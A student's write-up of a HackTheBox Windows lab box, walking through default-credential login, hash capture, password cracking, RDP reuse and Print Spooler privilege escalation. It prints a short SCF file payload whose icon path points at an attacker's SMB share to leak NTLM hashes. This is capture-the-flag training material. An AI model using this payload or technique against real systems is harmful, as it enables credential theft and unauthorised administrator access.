Fontys S7

HackTheBox Windows Write-up

First lets start with the basic enumeration and do a NMap.

When navigating to the webpage we are greeted by a login screen. After some searching and not finding anything useful I tried to login with just a default password admin:admin it was a longshot but it worked!

The only button that worked on the website was Firmware updates where you can upload a file. Knowing that SMB was also an open port I found this website this could potentially it so lets try it out. 

                
                    [Shell]
                    Command=2
                    Iconfile=\\10.10.14.161\share\test.ico
                    [Taskbar]
                    Command=ToggleDesktop

I created a payload like the example given on the site I found started responder and got a few hits. Now we know the username and maybe the password if we manage to crack it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it and see what we'll get.

Hashcat cracked the password with ease and now we can take a look at the SMB folder to see if we can find anything interesting.

We didn't find anything interesting but knowing from the NMap output we also know that the RDP port is open so maybe it uses the same password.

This was indeed the case and now we already have the user flag. For priv esc running at least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target machine.

Really the only interesting thing WinPEAS found was a Print spooler process. After some Googling I stubled across this CVE. So lets get that exploit on the target machine in the same way we did with WinPEAS.

I wasn't able to run the script because of some permission issues, but after some Googling I found out I could just set the policy to unrestricted.

I ran the exploit and it created a new administrator account for me with a username and password that I chose and know. Now the only thing that's left is just to logout as this user and login with our new user.

And that's it! We have the root flag! This box wasn't that hard but still fun and sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun learning experience.